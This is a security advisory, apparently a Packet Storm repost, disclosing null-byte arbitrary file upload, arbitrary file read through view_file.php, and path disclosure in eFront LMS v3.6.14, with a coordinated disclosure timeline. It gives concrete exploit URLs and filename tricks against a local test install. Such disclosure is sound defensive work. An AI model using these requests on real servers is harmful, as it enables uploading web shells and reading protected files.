eFront LMS version 3.6.14 suffers from arbitrary file upload, file read, and path disclosure vulnerabilities.
236bf191a5b34718ed687f6cdf5729cb22931ec79eda5c590ecd278be5ac58d2=============================================================
__ __ _ ___ _ __ ____
\ \ / / | | / _ \ (_) /_ | |___ \
___ \ V / _ __ | | | | | | _ | | __) | _ __
/ _ \ > < | '_ \ | | | | | | | | | | |__ < | '__|
| __/ / . \ | |_) | | | | |_| | | | | | ___) | | |
\___| /_/ \_\ | .__/ |_| \___/ |_| |_| |____/ |_|
| |
|_| blackpentesters.blogspot.com
=============================================================
# Exploit Title: [ eFront LMS v3.6.14 - build 18012 Multiple Vulnerabilities] # Exploit Author: [ eXpl0i13r ]
# Vendor Homepage: [ http://www.efrontlearning.net/ ]
# Software Link: [ http://sourceforge.net/projects/efrontlearning/files/latest/download ] # Contact: [ expl0i13r@gmail.com ]
# Coordinated Disclosure
eFront LMS v3.6.14 - build 18012 is vulnerable to :
1. Arbitrary File Upload & Internal Path Disclosure
2. Access to restricted folder ( Backup )
1. Arbitrary File Upload:
===========================
a. Import Course:
------------------
URL : http://127.0.0.1/efront/www/professor.php?ctg=lessons&course=2&op=import_course
In "Import Course" module attacker can upload any arbitrary file by appending "%00" Example test%00 , test.php%00, test.txt%00 , and file will be uploaded into :
"C:\xampp\htdocs\[ efront ]\upload\professor\temp"
Once file is uploaded it throws error which discloses Web Applications Internal Path, which provides fair idea of Internal Directory Structure.
Error:
------
"Problem importing file: File does not exist: C:/xampp/htdocs/efront/upload/professor/temp/data.dat (102)"
b. Personal Info (Account)
---------------------------
URL: http://127.0.0.1/efront/www/professor.php?ctg=personal&user=professor&op=profile
Attacker can upload arbitrary files by appending "%00" at the end of filename , Ex. test.php%00, file%00 , and file will be uploaded to "C:\xampp\htdocs\[ efront ]\upload\professor\avatars" in My case.
2. Read Arbitary Files:
-------------------------
Uploaded Avatars can be viewed using below link:
http://127.0.0.1/efront/www/view_file.php?file=C%3A/xampp/htdocs/efront/upload/professor/avatars/test.php%2500
Due to improper sanitization of "file" parameter attacker can view arbitary files especially from "backup" folder which in our case was readable by professor :
[-] Accessing Arbitary Files:
------------------------------
http://127.0.0.1/efront/www/view_file.php?file=C%3A/xampp/htdocs/[ efront ]/backups/.htaccess
http://127.0.0.1/efront/www/view_file.php?file=C%3A/xampp/htdocs/[ efront ]/upload/professor/temp/eFront.zip
http://127.0.0.1/efront/www/view_file.php?file=C%3A/xampp/htdocs/[ efront ]/www/php.ini
[-] Disclosure timeline:
-------------------------
[13/12/2013] - Vulnerabilities discovered
[13/12/2013] - Issues reported to Vendor by E-Mail
[17/12/2013] - Vendor update released [ v3.6.14.2 - build 18013 - build 18013 ]: http://forum.efrontlearning.net/viewtopic.php?f=15&t=8522
[18/12/2013] - Public disclosure
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed